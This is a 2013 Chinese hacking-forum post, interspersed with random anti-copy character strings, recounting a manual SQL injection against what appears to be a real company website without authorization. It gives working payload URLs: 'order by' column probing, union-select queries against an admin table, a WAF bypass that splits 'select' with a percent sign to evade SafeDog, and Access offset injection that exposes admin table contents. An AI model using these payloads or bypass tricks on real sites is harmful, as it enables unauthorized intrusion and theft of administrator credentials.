中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
: j) N$ Q0 G+ s! c! V
5 [+ w$ e+ v* n0 J' t) M) N: G' o
顺手加个admin
: a& X/ ]5 h& z+ S4 ^
( E8 T1 h0 O& Q# r  H7 U  j
# r/ G* g2 J1 j% _2 s( t% x默认后台。! p" |* ]: X4 `0 S3 P+ F1 {
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
7 E8 I/ C) n5 H  G
8 ^  V" G, h7 I: D# y4 \
' g8 J2 g$ ?! W  u6 h2 X# m& T! r
9 ]7 X& t% c6 s$ b$ s所以就不用御剑扫了,待会直接封IP。
7 v' ?1 T. \) V
. p9 S: }2 w, K# y0 a# X  V用order by语句判断是否存在注入。
$ m3 |' w+ }' [) z& k+ u6 B6 bhttp://www.xxx.com /product_show.asp?id=997 order by 1
4 c+ Y; K7 r: s0 Q8 khttp://www.xxx.com /product_show.asp?id=997 order by 100
) y2 Y; Z$ b7 ^, e; B. M- r现在存在注入,经测试后发现是9个字段。0 o" y2 f1 D; E- j

5 q7 i( D3 M5 U; N5 R. t接下来进行联合查询,猜是否存在admin表。/ P) D( ?" ~- o4 T% @; s- n6 w6 J
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​! K# m3 k1 n1 f
! l9 x. m6 G$ Z
% @+ Z; k9 m; I3 v( _& W) |. \9 P7 h

/ a4 }+ @% L6 ^1 `; g3 Q2 t. h在select中间加个%,se%lect绕过安全狗。
/ b) \) s: G: A# U2 x# l
0 F, Z' s1 c* F) j
- H/ b! f9 Z  T! L  B0 H1 V发现存在admin表,然后开始手工猜常用的字段。$ [( S  A8 }% ]% `6 V
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
9 j% J5 L8 W) }2 |8 ~" G' X 5 `8 L4 E* M& Y" T7 _
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。5 H9 X8 x$ u# n0 I) [

- o) G% E$ w& z1 S3 r2 O2 N/ e科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。4 ]" |" F3 z8 e  f5 t1 G3 R9 O
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
) u7 r5 ]) T2 ^, ?" y9 J好了,敏感内容出显了。​
! ^/ ~" o3 j& ^- e# C3 d: @" P6 Z

( l8 A0 w% n( `+ t( S( Z7 ~( O
. s( U+ m5 u3 d' `/ \




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2